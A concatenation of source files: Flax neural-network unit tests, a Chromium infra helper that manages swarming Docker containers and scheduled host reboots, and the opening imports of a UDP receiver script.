y, params = DummyModule.init_by_shape(rng, [(x.shape, x.dtype)])
y2 = DummyModule.call(params, x)
self.assertEqual(y.shape, y2.shape)
self.assertEqual(y2, jnp.array([2.]))
self.assertEqual(params, {'bias': jnp.array([1.])})
def test_model(self):
rng = random.PRNGKey(0)
x = jnp.array([1.])
_, params = DummyModule.init(rng, x)
model = nn.Model(DummyModule, params)
y = model(x)
self.assertEqual(y, jnp.array([2.]))
y2 = jax.jit(model)(x)
self.assertEqual(y2, jnp.array([2.]))
def test_shared_module(self):
rng = random.PRNGKey(0)
x = jnp.array([1.])
_, initial_params = LoopModule.init(rng, x)
model = nn.Model(LoopModule, initial_params)
y = model(x)
self.assertEqual(y, jnp.array([3.]))
self.assertEqual(model.params, {'dummy': {'bias': jnp.array([1.])}})
def test_name_collsion(self):
class FaultyModule(nn.Module):
def apply(self, x):
for _ in range(2):
DummyModule(x, name='dummy')
x = jnp.array([1.])
with self.assertRaises(ValueError):
FaultyModule.init(random.PRNGKey(0), x)
def test_sharing_name_collsion(self):
class FaultyModule(nn.Module):
def apply(self, x):
for _ in range(2):
module = DummyModule.shared(name='dummy')
module(x)
x = jnp.array([1.])
with self.assertRaises(ValueError):
FaultyModule.init(random.PRNGKey(0), x)
def test_sharing_name_on_apply(self):
class FaultyModule(nn.Module):
def apply(self, x):
module = DummyModule.shared(name='dummy')
for _ in range(2):
module(x, name='dummy2')
x = jnp.array([1.])
with self.assertRaises(ValueError):
FaultyModule.init(random.PRNGKey(0), x)
def test_shared_module_called_in_other_frame(self):
"""Test that shared modules only appear once in parameters.
Concretely, create a shared submodule, then pass it in to
a child module and apply it there. Test that the parameters
are only stored once, in the frame where the shared module
was created.
"""
class SubModule(nn.Module):
def apply(self):
self.param('params', (), initializers.zeros)
class UseSharedModule(nn.Module):
def apply(self, submodule):
submodule()
class TopLevel(nn.Module):
def apply(self):
submodule = SubModule.shared(name='shared')
submodule()
UseSharedModule(submodule, name='use_shared')
_, params = TopLevel.init(random.PRNGKey(0))
self.assertEqual({
'shared': {'params': jnp.zeros(())},
'use_shared': {},
}, params)
def test_module_decorator(self):
@nn.module
def MyModule(x): # pylint: disable=invalid-name
return DummyModule(x)
self.assertEqual(MyModule.__name__, 'MyModule')
self.assertTrue(issubclass(MyModule, nn.Module))
rng = random.PRNGKey(0)
x = jnp.array([1.])
y, params = MyModule.init(rng, x)
y2 = MyModule.call(params, x)
self.assertEqual(y, y2)
self.assertEqual(y, jnp.array([2.]))
def test_partial_application(self):
rng = random.PRNGKey(0)
x = jnp.array([1.])
dummy_module = DummyModule.partial(x=x) # partially apply the inputs
self.assertEqual(DummyModule.__name__, dummy_module.__name__)
self.assertEqual(DummyModule.__qualname__, dummy_module.__qualname__)
y, initial_params = dummy_module.init(rng)
model = nn.Model(dummy_module, initial_params)
y2 = model()
self.assertEqual(y.shape, y2.shape)
self.assertEqual(y2, jnp.array([2.]))
def test_nested_model(self):
x = jnp.array([1.])
_, inner_initial_params = DummyModule.init(random.PRNGKey(0), x)
inner_model = nn.Model(DummyModule, inner_initial_params)
_, initial_params = NestedModel.init(random.PRNGKey(1), x, inner_model)
model = nn.Model(NestedModel, initial_params)
y = model(x, inner_model)
self.assertEqual(y, jnp.array([3.]))
def test_capture_module_outputs(self):
x = jnp.array([1.])
_, initial_params = NestedModule.init(random.PRNGKey(0), x)
model = nn.Model(NestedModule, initial_params)
with nn.capture_module_outputs() as activations:
model(x)
expected_activations = {
'/': [x + 2],
'/dummy_0': [x + 1],
'/dummy_1': [x + 2],
}
self.assertEqual(activations.as_dict(), expected_activations)
def test_nested_model_capture_outputs(self):
x = jnp.array([1.])
_, inner_initial_params = DummyModule.init(random.PRNGKey(0), x)
inner_model = nn.Model(DummyModule, inner_initial_params)
_, initial_params = NestedModel.init(random.PRNGKey(1), x, inner_model)
model = nn.Model(NestedModel, initial_params)
with nn.capture_module_outputs() as activations:
model(x, inner_model)
expected_activations = {
'/': [x + 2],
'/dummy_0': [x + 1],
'/inner_model': [x + 2],
}
self.assertEqual(activations.as_dict(), expected_activations)
def test_truncated_module(self):
x = jnp.array([1.])
_, initial_params = NestedModule.init(random.PRNGKey(0), x)
model = nn.Model(NestedModule, initial_params)
model = model.truncate_at('/dummy_0')
y = model(x)
self.assertEqual(y, [x + 1])
def test_call_module_method(self):
class MultiMethod(nn.Module):
def apply(self, x):
return x + self.param('bias', x.shape, initializers.ones)
@nn.module_method
def l2(self):
return jnp.sum(self.get_param('bias') ** 2)
class MultiMethodModel(nn.Module):
def apply(self, x):
layer = MultiMethod.shared()
layer(x) # init
return layer.l2()
self.assertEqual(
MultiMethod.l2.__qualname__,
MultiMethod.__qualname__ + '.l2')
x = jnp.array([1., 2.])
_, params = MultiMethod.init(random.PRNGKey(0), x)
model = nn.Model(MultiMethod, params)
self.assertEqual(model.l2(), 2.)
y, _ = MultiMethodModel.init(random.PRNGKey(0), x)
self.assertEqual(y, 2.)
def test_module_state(self):
class StatefulModule(nn.Module):
def apply(self, x, coll=None):
state = self.state('state', x.shape, nn.initializers.zeros,
collection=coll)
state.value += x
x = jnp.array([1.,])
# no collection should raise an error
with self.assertRaises(ValueError):
StatefulModule.call({}, x)
# pass collection explicitly
with nn.Collection().mutate() as state:
self.assertEqual(state.as_dict(), {})
StatefulModule.init(random.PRNGKey(0), x, state)
self.assertEqual(state.as_dict(), {'/': {'state': x}})
self.assertEqual(state.as_dict(), {'/': {'state': x}})
with state.mutate() as new_state:
# assert new_state is a clone of state
self.assertEqual(new_state.as_dict(), state.as_dict())
StatefulModule.call({}, x, new_state)
self.assertEqual(new_state.as_dict(), {'/': {'state': x + x}})
# use stateful
with nn.stateful() as state:
self.assertEqual(state.as_dict(), {})
StatefulModule.init(random.PRNGKey(0), x)
self.assertEqual(state.as_dict(), {'/': {'state': x}})
with nn.stateful(state) as new_state:
# assert new_state is a clone of state
self.assertEqual(new_state.as_dict(), state.as_dict())
StatefulModule.call({}, x)
self.assertEqual(new_state.as_dict(), {'/': {'state': x + x}})
self.assertEqual(new_state.as_dict(), {'/': {'state': x + x}})
def test_parameter_rng(self):
@nn.module
def model(x):
return nn.Dense(x, features=2, name='dummy',
bias_init=nn.initializers.normal())
rng = random.PRNGKey(0)
_, params = model.init(rng, jnp.ones((1, 1)))
dense_rng = nn.base._fold_in_str(rng, 'dummy')
kernel_rng = nn.base._fold_in_str(dense_rng, 'kernel')
bias_rng = nn.base._fold_in_str(dense_rng, 'bias')
kernel = nn.linear.default_kernel_init(kernel_rng, (1, 2))
bias = nn.initializers.normal()(bias_rng, (2,))
onp.testing.assert_allclose(kernel, params['dummy']['kernel'])
onp.testing.assert_allclose(bias, params['dummy']['bias'])
class CollectionTest(absltest.TestCase):
def test_collection_store_and_retrieve(self):
rng = random.PRNGKey(0)
x = jnp.array([1.])
with nn.Collection().mutate() as activations:
(_, y), initial_params = CollectionModule.init(rng, x, activations)
model = nn.Model(CollectionModule, initial_params)
self.assertEqual(y, None)
with activations.mutate() as new_activations:
_, y2 = model(x, new_activations)
self.assertEqual(y2, jnp.array([2.]))
def test_collection_multiple_calls(self):
rng = random.PRNGKey(0)
with nn.Collection().mutate() as activations:
x = jnp.array([1.])
_, _ = LoopModule.init(rng, x, activations)
expected_state = {
'/dummy': jnp.array([3.]),
}
self.assertEqual(activations.state, expected_state)
def test_collection_multiple_roots(self):
rng = random.PRNGKey(0)
with nn.Collection().mutate() as activations:
x = jnp.array([1.])
LoopModule.init(rng, x, activations, name='a')
LoopModule.init(rng, x, activations, name='b')
expected_state = {
'/a/dummy': jnp.array([3.]),
'/b/dummy': jnp.array([3.]),
}
self.assertEqual(activations.state, expected_state)
with self.assertRaises(ValueError):
with nn.Collection().mutate() as activations:
x = jnp.array([1.])
LoopModule.init(rng, x, activations)
LoopModule.init(rng, x, activations)
def test_mutable_collection_cannot_be_passed_to_jax(self):
with nn.Collection().mutate() as collection:
def fn(col):
return col
with self.assertRaises(ValueError):
jax.jit(fn)(collection)
def test_collection_lookup(self):
state = {
'/dummy/sub': 1,
}
collection = nn.Collection(state=state)
root = nn.base._ModuleFrame(None)
frame = nn.base._ModuleFrame('dummy', parent=root)
with nn.base._module_stack.frame(root):
with nn.base._module_stack.frame(frame):
self.assertEqual(collection['/dummy/sub'], 1)
def test_collection_inside_module(self):
class NestedCollection(nn.Module):
def apply(self, x):
with nn.Collection().mutate() as activations:
LoopModule(x, activations, name='a')
LoopModule(x, activations, name='b')
return activations
rng = random.PRNGKey(0)
x = jnp.array([1.])
activations, _ = NestedCollection.init(rng, x, name='nested')
expected_state = {
'/a/dummy': jnp.array([3.]),
'/b/dummy': jnp.array([3.]),
}
self.assertEqual(activations.as_dict(), expected_state)
def test_collection_store_fails_if_not_in_module(self):
@nn.module
def test():
with nn.Collection().mutate() as coll:
coll.store(1)
pattern = 'State should be stored from within a module'
with self.assertRaisesRegex(ValueError, pattern):
test.init(random.PRNGKey(0))
def test_collection_store_fails_if_out_of_scope(self):
@nn.module
def stateful_module(coll):
coll.store(1)
@nn.module
def test_inner(f):
with nn.Collection().mutate() as coll:
# this should fail because f is a shared module defined
# in the parent. Therefore we cannot capture in the scope
# of this Module.
f(coll)
@nn.module
def test():
f = stateful_module.shared()
test_inner(f)
pattern = 'Trying to capture state outside the scope'
with self.assertRaisesRegex(ValueError, pattern):
test.init(random.PRNGKey(0))
# TODO(jheek): re-introduce this test when the tracer check is revived.
# def test_jax_transform_of_stateful_function(self):
# test = self
# class NestedTransform(nn.Module):
# def apply(self, state, y):
# def inner_fn(x):
# # constants should be storable
# state.store(1.)
# # values in the same trace should be storable
# state.store({'a': y})
# with test.assertRaises(ValueError):
# # values depending on the vmap should not be storable
# state.store({'a': y, 'b': x})
# jax.vmap(inner_fn)(jnp.ones((2,)))
# def outer_fn(x):
# with nn.Collection().mutate() as state:
# NestedTransform.init(random.PRNGKey(0), state, x)
# outer_fn(1.)
# jax.jit(outer_fn)(1.)
class UtilsTest(absltest.TestCase):
def test_call_stack_happy_path(self):
stack = nn.utils.CallStack()
self.assertFalse(stack)
with stack.frame({'id': 1}):
self.assertTrue(stack)
self.assertEqual(stack[-1], {'id': 1})
with stack.frame({'id': 2}):
self.assertEqual(list(stack), [{'id': 1}, {'id': 2}])
self.assertEqual(list(stack), [{'id': 1}])
def test_call_stack_multithreading(self):
stack = nn.utils.CallStack()
self.assertFalse(stack)
with stack.frame({'id': 1}):
self.assertEqual(stack[-1], {'id': 1})
def _main():
# Each thread should have its own stack.
self.assertFalse(stack)
with stack.frame({'id': 2}):
self.assertEqual(stack[-1], {'id': 2})
thread = threading.Thread(target=_main)
thread.start()
thread.join()
def test_call_stack_error_path(self):
stack = nn.utils.CallStack()
with stack.frame({'id': 1}):
with self.assertRaises(ValueError):
with stack.frame({'id': 2}):
raise ValueError('dummy')
self.assertEqual(list(stack), [{'id': 1}])
class PoolTest(absltest.TestCase):
def test_pool_custom_reduce(self):
x = jnp.full((1, 3, 3, 1), 2.)
mul_reduce = lambda x, y: x * y
y = nn.pooling.pool(x, 1., mul_reduce, (2, 2), (1, 1), 'VALID')
onp.testing.assert_allclose(y, onp.full((1, 2, 2, 1), 2. ** 4))
def test_avg_pool(self):
x = jnp.full((1, 3, 3, 1), 2.)
pool = lambda x: nn.avg_pool(x, (2, 2))
y = pool(x)
onp.testing.assert_allclose(y, onp.full((1, 2, 2, 1), 2.))
y_grad = jax.grad(lambda x: pool(x).sum())(x)
expected_grad = jnp.array([
[0.25, 0.5, 0.25],
[0.5, 1., 0.5],
[0.25, 0.5, 0.25],
]).reshape((1, 3, 3, 1))
onp.testing.assert_allclose(y_grad, expected_grad)
def test_max_pool(self):
x = jnp.arange(9).reshape((1, 3, 3, 1)).astype(jnp.float32)
pool = lambda x: nn.max_pool(x, (2, 2))
expected_y = jnp.array([
[4., 5.],
[7., 8.],
]).reshape((1, 2, 2, 1))
y = pool(x)
onp.testing.assert_allclose(y, expected_y)
y_grad = jax.grad(lambda x: pool(x).sum())(x)
expected_grad = jnp.array([
[0., 0., 0.],
[0., 1., 1.],
[0., 1., 1.],
]).reshape((1, 3, 3, 1))
onp.testing.assert_allclose(y_grad, expected_grad)
def test_max_pool_explicit_pads(self):
x = jnp.arange(9).reshape((1, 3, 3, 1)).astype(jnp.float32)
pool = lambda x: nn.max_pool(x, (2, 2), padding=((1,1),(1,1)))
expected_y = jnp.array([
[0.,1.,2.,2.],
[3.,4.,5.,5.],
[6.,7.,8.,8.],
[6.,7.,8.,8.],
]).reshape((1, 4, 4, 1))
y = pool(x)
onp.testing.assert_allclose(y, expected_y)
y_grad = jax.grad(lambda x: pool(x).sum())(x)
expected_grad = jnp.array([
[1., 1., 2.],
[1., 1., 2.],
[2., 2., 4.],
]).reshape((1, 3, 3, 1))
onp.testing.assert_allclose(y_grad, expected_grad)
class NormalizationTest(absltest.TestCase):
def test_batch_norm(self):
rng = random.PRNGKey(0)
key1, key2 = random.split(rng)
x = random.normal(key1, (4, 3, 2))
model_cls = nn.BatchNorm.partial(momentum=0.9)
with nn.stateful() as state_0:
y, initial_params = model_cls.init(key2, x)
model = nn.Model(model_cls, initial_params)
mean = y.mean((0, 1))
var = y.var((0, 1))
onp.testing.assert_allclose(mean, onp.array([0., 0.]), atol=1e-4)
onp.testing.assert_allclose(var, onp.array([1., 1.]), rtol=1e-4)
with nn.stateful(state_0) as state:
y = model(x)
ema = state['/']
onp.testing.assert_allclose(
ema['mean'], 0.1 * x.mean((0, 1), keepdims=False), atol=1e-4)
onp.testing.assert_allclose(
ema['var'], 0.9 + 0.1 * x.var((0, 1), keepdims=False), rtol=1e-4)
def test_layer_norm(self):
rng = random.PRNGKey(0)
key1, key2 = random.split(rng)
e = 1e-5
x = random.normal(key1, (2, 3, 4))
y, _ = nn.LayerNorm.init(key2, x, bias=False, scale=False, epsilon=e)
assert x.shape == y.shape
input_type = type(x)
assert isinstance(y, input_type)
y_one_liner = ((x - x.mean(axis=-1, keepdims=True)) *
jax.lax.rsqrt(x.var(axis=-1, keepdims=True) + e))
onp.testing.assert_allclose(y_one_liner, y, atol=1e-4)
def test_group_norm(self):
rng = random.PRNGKey(0)
key1, key2 = random.split(rng)
e = 1e-5
x = random.normal(key1, (2, 5, 4, 4, 32))
y, _ = nn.GroupNorm.init(key2, x, num_groups=2,
bias=True, scale=True, epsilon=e)
self.assertEqual(x.shape, y.shape)
self.assertIsInstance(y, type(x))
x_gr = x.reshape([2, 5, 4, 4, 2, 16])
y_test = ((x_gr - x_gr.mean(axis=[1, 2, 3, 5], keepdims=True)) *
jax.lax.rsqrt(x_gr.var(axis=[1, 2, 3, 5], keepdims=True) + e))
y_test = y_test.reshape([2, 5, 4, 4, 32])
onp.testing.assert_allclose(y_test, y, atol=1e-4)
# TODO(flax-dev): add integration tests for RNN cells
class RecurrentTest(absltest.TestCase):
def test_lstm(self):
rng = random.PRNGKey(0)
key1, key2 = random.split(rng)
x = random.normal(key1, (2, 3))
c0, h0 = nn.LSTMCell.initialize_carry(rng, (2,), 4)
self.assertEqual(c0.shape, (2, 4))
self.assertEqual(h0.shape, (2, 4))
(carry, y), initial_params = nn.LSTMCell.init(key2, (c0, h0), x)
lstm = nn.Model(nn.LSTMCell, initial_params)
self.assertEqual(carry[0].shape, (2, 4))
self.assertEqual(carry[1].shape, (2, 4))
onp.testing.assert_allclose(y, carry[1])
param_shapes = jax.tree_map(onp.shape, lstm.params)
self.assertEqual(param_shapes, {
'ii': {'kernel': (3, 4)},
'if': {'kernel': (3, 4)},
'ig': {'kernel': (3, 4)},
'io': {'kernel': (3, 4)},
'hi': {'kernel': (4, 4), 'bias': (4,)},
'hf': {'kernel': (4, 4), 'bias': (4,)},
'hg': {'kernel': (4, 4), 'bias': (4,)},
'ho': {'kernel': (4, 4), 'bias': (4,)},
})
def test_gru(self):
rng = random.PRNGKey(0)
key1, key2 = random.split(rng)
x = random.normal(key1, (2, 3))
carry0 = nn.GRUCell.initialize_carry(rng, (2,), 4)
self.assertEqual(carry0.shape, (2, 4))
(carry, y), initial_params = nn.GRUCell.init(key2, carry0, x)
gru = nn.Model(nn.GRUCell, initial_params)
self.assertEqual(carry.shape, (2, 4))
onp.testing.assert_allclose(y, carry)
param_shapes = jax.tree_map(onp.shape, gru.params)
self.assertEqual(param_shapes, {
'ir': {'kernel': (3, 4), 'bias': (4,)},
'iz': {'kernel': (3, 4), 'bias': (4,)},
'in': {'kernel': (3, 4), 'bias': (4,)},
'hr': {'kernel': (4, 4)},
'hz': {'kernel': (4, 4)},
'hn': {'kernel': (4, 4), 'bias': (4,)},
})
def test_conv2dlstm(self):
rng = random.PRNGKey(0)
key1, key2 = random.split(rng)
x = random.normal(key1, (2, 4, 4, 3))
c0, h0 = nn.ConvLSTM.initialize_carry(rng, (2,), (4, 4, 6))
self.assertEqual(c0.shape, (2, 4, 4, 6))
self.assertEqual(h0.shape, (2, 4, 4, 6))
(carry, y), initial_params = nn.ConvLSTM.init(
key2, (c0, h0), x, features=6, kernel_size=(3, 3))
lstm = nn.Model(nn.ConvLSTM, initial_params)
self.assertEqual(carry[0].shape, (2, 4, 4, 6))
self.assertEqual(carry[1].shape, (2, 4, 4, 6))
onp.testing.assert_allclose(y, carry[1])
param_shapes = jax.tree_map(onp.shape, lstm.params)
self.assertEqual(param_shapes, {
'hh': {'bias': (6*4,), 'kernel': (3, 3, 6, 6*4)},
'ih': {'bias': (6*4,), 'kernel': (3, 3, 3, 6*4)},
})
class StochasticTest(absltest.TestCase):
def test_make_rng_requires_stochastic(self):
with self.assertRaises(ValueError):
nn.make_rng()
def test_stochastic_rngs(self):
rng = random.PRNGKey(0)
with nn.stochastic(rng):
r1 = nn.make_rng()
r2 = nn.make_rng()
self.assertTrue(onp.all(r1 == random.fold_in(rng, 1)))
self.assertTrue(onp.all(r2 == random.fold_in(rng, 2)))
# TODO(jheek): re-introduce this test when the tracer check is revived.
# def test_make_rng_in_jax_transform_check(self):
# with nn.stochastic(random.PRNGKey(0)):
# with self.assertRaises(ValueError):
# jax.jit(nn.make_rng)()
def test_init_by_shape_lifts_stochastic(self):
class StochasticModule(nn.Module):
def apply(self):
return nn.make_rng()
with nn.stochastic(random.PRNGKey(0)):
rng, _ = StochasticModule.init_by_shape(random.PRNGKey(1), [])
expected_rng = random.fold_in(random.PRNGKey(0), 1)
expected_rng = random.fold_in(expected_rng, 1)
self.assertTrue(onp.all(rng == expected_rng))
if __name__ == '__main__':
absltest.main()
|
main_helpers.py
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
import argparse
import contextlib
import datetime
import hashlib
import json
import logging
import logging.handlers
import os
import socket
import subprocess
import sys
import threading
import time
import six
from infra.libs.service_utils import daemon
from infra.services.swarm_docker import containers
_REGISTRY_URL = 'gcr.io'
# Location of file that will prevent this script from spawning new containers.
# Useful when draining a host in order to debug failures. BOT_SHUTDOWN_FILE
# drains all containers, but individual containers can also be drained using
# container's shutdown file as returned by its descriptor class.
BOT_SHUTDOWN_FILE = '/b/shutdown.stamp'
# Similar to BOT_SHUTDOWN_FILE, but triggers a host reboot after all containers
# have been drained.
BOT_REBOOT_FILE = '/b/reboot.stamp'
# Minimum time a host must be up before it can be restarted again.
_MIN_HOST_UPTIME = 60
# Defined in
# https://chromium.googlesource.com/infra/infra/+/master/build/packages/swarm_docker.yaml
_CIPD_VERSION_FILE = os.path.abspath(os.path.join(
os.path.dirname(__file__), '..', '..', '..', 'CIPD_VERSION.json'))
def get_cipd_version(): # pragma: no cover
if not os.path.exists(_CIPD_VERSION_FILE):
logging.warning('Unable to find cipd version file %s', _CIPD_VERSION_FILE)
return None
try:
with open(_CIPD_VERSION_FILE) as f:
d = json.load(f)
return d.get('instance_id')
except (IOError, ValueError):
logging.exception('Unable to read cipd version file %s', _CIPD_VERSION_FILE)
return None
def fuzz_max_uptime(max_uptime):
"""Returns max_uptime fuzzed by up to 20% of the original value."""
fqdn = six.ensure_binary(socket.getfqdn())
# Don't use the built-in hash function since that's not deterministic across
# different processes.
fqdn_hash = hashlib.md5(fqdn).hexdigest()
fuzz_amount = int(fqdn_hash, 16) % int(max_uptime * 0.2)
return max_uptime + fuzz_amount
def get_host_uptime():
"""Returns host uptime in minutes."""
with open('/proc/uptime') as f:
uptime = float(f.readline().split()[0])
return uptime / 60
def update_docker(canary, docker_version):
"""Update the docker package prior to reboot.
This will automatically keep the docker package up to date and running prior
to reboot will ensure that no containers are running, so no disruptions. This
will also remove older docker packages (docker-engine) automatically.
Args:
canary: (bool) If this is a canary host or not.
docker_version: (str) Docker package version to ensure is installed.
"""
package_with_version = 'docker-ce'
if canary:
# This will cause apt to install the latest version.
logging.info('Ensuring the latest version of docker-ce is installed.')
else:
package_with_version = 'docker-ce=%s' % docker_version
logging.info('Ensuring %s is installed.', package_with_version)
# Not doing a lot of dpkg/apt-cache checking here as the runtime to just try
# an install is only 1.1 seconds.
try:
subprocess.check_call(['/usr/bin/apt-get', 'update'])
except subprocess.CalledProcessError:
# We don't care enough to abort reboot here, only if install fails.
logging.exception('Unable to apt-get update.')
try:
subprocess.check_call(['/usr/bin/apt-get', 'install', '-y',
package_with_version])
except subprocess.CalledProcessError:
logging.exception('Unable to install/upgrade docker-ce to %s.',
package_with_version)
return False
return True
def reboot_host(canary=False, docker_version=''):
if docker_version:
if not update_docker(canary, docker_version):
logging.warning('Not rebooting, something went wrong.')
return
# This script runs as root.
try:
subprocess.check_call(['/sbin/reboot'])
except subprocess.CalledProcessError:
logging.exception('Unable to reboot host.')
class FlockTimeoutError(Exception):
pass
@contextlib.contextmanager
def flock(lock_file, retries=20, sleep_duration=3): # pragma: no cover
logging.debug('Acquiring file lock on %s...', lock_file)
i = 0
while True:
try:
with daemon.flock(lock_file):
logging.debug('Lock acquired on %s.', lock_file)
try:
yield
finally:
logging.debug('Releasing lock on %s.', lock_file)
break
except daemon.LockAlreadyLocked:
if i == retries - 1:
raise FlockTimeoutError()
else:
logging.debug('Lock on %s busy; sleeping for %d seconds.',
lock_file, sleep_duration)
i += 1
time.sleep(sleep_duration)
def reboot_gracefully(args, running_containers):
"""Reboot the host and attempt to gracefully stop running containers.
Returns:
True if reboot sequence has been started. Callers should not spawn new
containers. Actual reboot may not be triggered due to running tasks.
"""
uptime = get_host_uptime()
fuzzed_max_host_uptime = fuzz_max_uptime(args.max_host_uptime)
mins_since_scheduled_reboot = uptime - fuzzed_max_host_uptime
if mins_since_scheduled_reboot > 0:
logging.debug('Host uptime over fuzzed max uptime (%d > %d).',
uptime, fuzzed_max_host_uptime)
else:
return False
if running_containers:
if mins_since_scheduled_reboot > args.reboot_grace_period:
logging.warning(
'Drain exceeds grace period of %d min. Rebooting host now '
'despite %d running containers.', args.reboot_grace_period,
len(running_containers))
reboot_host(args.canary, args.docker_version)
else:
logging.debug(
'Still %d containers running. Shutting them down first.',
len(running_containers))
for c in running_containers:
c.kill_swarming_bot()
else:
logging.debug('No running containers. Rebooting host now.')
reboot_host(args.canary, args.docker_version)
return True
def launch_containers(
docker_client, container_descriptors, args): # pragma: no cover
rebooting_host = os.path.exists(BOT_REBOOT_FILE)
draining_host = os.path.exists(BOT_SHUTDOWN_FILE)
draining_container_descriptors = [
cd for cd in container_descriptors if os.path.exists(cd.shutdown_file)
]
if draining_host:
logging.info(
'In draining state due to existence of %s. No new containers will be '
'created.', BOT_SHUTDOWN_FILE)
elif rebooting_host:
logging.info(
'In draining state due to existence of %s. No new containers will be '
'created and host will be restarted.', BOT_REBOOT_FILE)
elif draining_container_descriptors:
logging.info(
'Draining containers %s due to existence of files: %s. They will not '
'be restarted automatically.',
[cd.name for cd in draining_container_descriptors],
[cd.shutdown_file for cd in draining_container_descriptors])
# Cleanup old containers that were stopped from a previous run.
# TODO(bpastene): Maybe enable auto cleanup with the -rm option?
docker_client.delete_stopped_containers()
running_containers = docker_client.get_running_containers()
# If there are no running containers, use this as an opportunity to clean
# up old images. It shouldn't take long.
image_url = (
_REGISTRY_URL + '/' + args.registry_project + '/' + args.image_name)
if not running_containers:
docker_client.remove_outdated_images(image_url)
if (not draining_host and not rebooting_host and args.max_host_uptime
and reboot_gracefully(args, running_containers)):
return
# Fetch the image from the registry if it's not present locally.
if not docker_client.has_image(image_url):
logging.debug('Local image missing. Fetching %s ...', image_url)
docker_client.login(_REGISTRY_URL, args.credentials_file)
docker_client.pull(image_url)
logging.debug('Image %s fetched.', image_url)
# Send SIGTERM to bots in containers that have been running for too long, or
# all of them regardless of uptime if draining. For Android containers (see
# infra.services.android_swarm package), some containers may go missing due
# to associated devices missing, so we need to examine *all* containers here
# instead of doing that inside the per-container flock below.
current_cipd_version = get_cipd_version()
if draining_host or rebooting_host:
for c in running_containers:
c.kill_swarming_bot()
if rebooting_host and not running_containers:
os.remove(BOT_REBOOT_FILE)
reboot_host(args.canary, args.docker_version)
else:
for cd in draining_container_descriptors:
c = docker_client.get_container(cd)
if c is not None:
c.kill_swarming_bot()
docker_client.stop_old_containers(
running_containers, args.max_container_uptime)
# Also stop any outdated container.
for c in running_containers:
if current_cipd_version is not None:
if c.labels.get('cipd_version') != current_cipd_version:
logging.debug(
'CIPD pkg version used to launch container %s has changed. '
'Shutting the container down.', c.name)
c.kill_swarming_bot()
continue
if not docker_client.image_matches_url(c.image, image_url):
logging.debug(
'Image of container %s is outdated. Shutting the container down.',
c.name)
c.kill_swarming_bot()
# Make sure all requested containers are running.
def _create_container(container_desc):
try:
with flock(container_desc.lock_file):
c = docker_client.get_container(container_desc)
if c is None:
labels = {}
# Attach current cipd version to container's metadata so it can
# be restarted if version changes.
if current_cipd_version is not None:
labels['cipd_version'] = current_cipd_version
docker_client.create_container(
container_desc, image_url, args.swarming_server, labels)
elif c.state == 'paused':
# Occasionally a container gets stuck in the paused state. Since
# the logic here is thread safe, this shouldn't happen, so
# explicitly unpause them before continuing.
# TODO(bpastene): Find out how/why.
logging.warning('Unpausing container %s.', c.name)
c.unpause()
else:
logging.debug('Nothing to do for container %s.', c.name)
except FlockTimeoutError:
logging.error(
'Timed out while waiting for lock on container %s.',
container_desc.name)
threads = []
docker_client.set_num_configured_containers(len(container_descriptors))
for cd in container_descriptors:
# TODO(sergiyb): Remove should_create_container logic from this generic
# container management loop and move it outside of the launch_container
# function as it's specific to Android devices only and thus should only
# be in the android_docker package.
if (cd.should_create_container() and
cd not in draining_container_descriptors):
# Split this into threads so a blocking container doesn't block the
# others (and also for speed!)
t = threading.Thread(target=_create_container, args=(cd,))
threads.append(t)
t.start()
for t in threads:
t.join()
def add_launch_arguments(parser): # pragma: no cover
def max_uptime(value):
value = int(value)
if value < _MIN_HOST_UPTIME and value != 0:
raise argparse.ArgumentTypeError(
'--max-host-time must be > %d or zero' % _MIN_HOST_UPTIME)
return value
parser.add_argument(
'-c', '--canary', action='store_true', default=False,
help='Run this as a canary bot.')
parser.add_argument(
'--docker-version',
default='',
help='The docker-ce version to be ensured is installed (ex: '
'18.06.3~ce~3-0~ubuntu). These values are supplied by puppet. If not '
'specified, no update will be triggered.')
parser.add_argument(
'--max-container-uptime', type=int, default=60 * 4,
help='Max uptime of a container, in minutes.')
parser.add_argument(
'--reboot-grace-period', type=int, default=60 * 4,
help='How long to wait (in minutes) for swarming bots to gracefully '
'shutdown before triggering a host reboot. Should be at least as '
'long as the longest expected task run time. Defaults to 4 hours.')
parser.add_argument(
'--image-name', default='swarm_docker:latest',
help='Name of docker image to launch from.')
parser.add_argument(
'--swarming-server', default='https://chromium-swarm.appspot.com',
help='URL of the swarming server to connect to.')
parser.add_argument(
'--registry-project', default='chromium-container-registry',
help='Name of gcloud project id for the container registry.')
parser.add_argument(
'--credentials-file',
default='/creds/service_accounts/'
'service-account-container_registry_puller.json',
help='Path to service account json file used to access the gcloud '
'container registry.')
parser.add_argument(
'--max-host-uptime', type=max_uptime, default=60 * 24,
help='Max uptime of the host, in minutes. A value of zero indicates the '
'host will never be rebooted automatically.')
def configure_logging(log_filename, log_prefix, verbose): # pragma: no cover
logger = logging.getLogger()
logger.setLevel(logging.DEBUG if verbose else logging.WARNING)
log_fmt = logging.Formatter(
'%(asctime)s.%(msecs)03d %(levelname)s ' + log_prefix + ' %(message)s' ,
datefmt='%y%m%d %H:%M:%S')
file_handler = logging.handlers.RotatingFileHandler(
'/var/log/chrome-infra/%s' % log_filename,
maxBytes=10 * 1024 * 1024, backupCount=5)
file_handler.setFormatter(log_fmt)
logger.addHandler(file_handler)
stdout_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stdout_handler)
# Quiet some noisy modules.
cmd_helper_logger = logging.getLogger('devil.utils.cmd_helper')
cmd_helper_logger.setLevel(logging.ERROR)
urllib3_logger = logging.getLogger('requests.packages.urllib3.connectionpool')
urllib3_logger.setLevel(logging.WARNING)
# urllib3's module path is different when invoked via vpython.
# TODO(crbug.com/977627): Remove the old path when we tear out infra VENV
# support.
vypy_urllib3_logger = logging.getLogger('urllib3.connectionpool')
vypy_urllib3_logger.setLevel(logging.WARNING)
@contextlib.contextmanager
def main_wrapper(): # pragma: no cover
if not sys.platform.startswith('linux'):
print('Only supported on linux.', file=sys.stderr)
sys.exit(1)
try:
yield
except containers.FrozenEngineError:
logging.exception('Docker engine frozen, triggering host reboot.')
# Skipping updates since something is very wrong with docker here.
reboot_host()
except Exception as e:
logging.exception('Exception:')
raise e
|
udp_receiver.py
|
import flask
import numpy as np
import os
import requests
import sys
from cv2 import cv2 as cv
from socket import AF_INET, SOCK_DGRAM, INADDR_ANY, IPPROTO_IP, IP_ADD_MEMBERSHIP, SOL_SOCKET, SO_REUSEADDR, socket, inet_aton, error as socket_error
import struct
from threading import Thread
import imagehash
from PIL import Image
class Request():
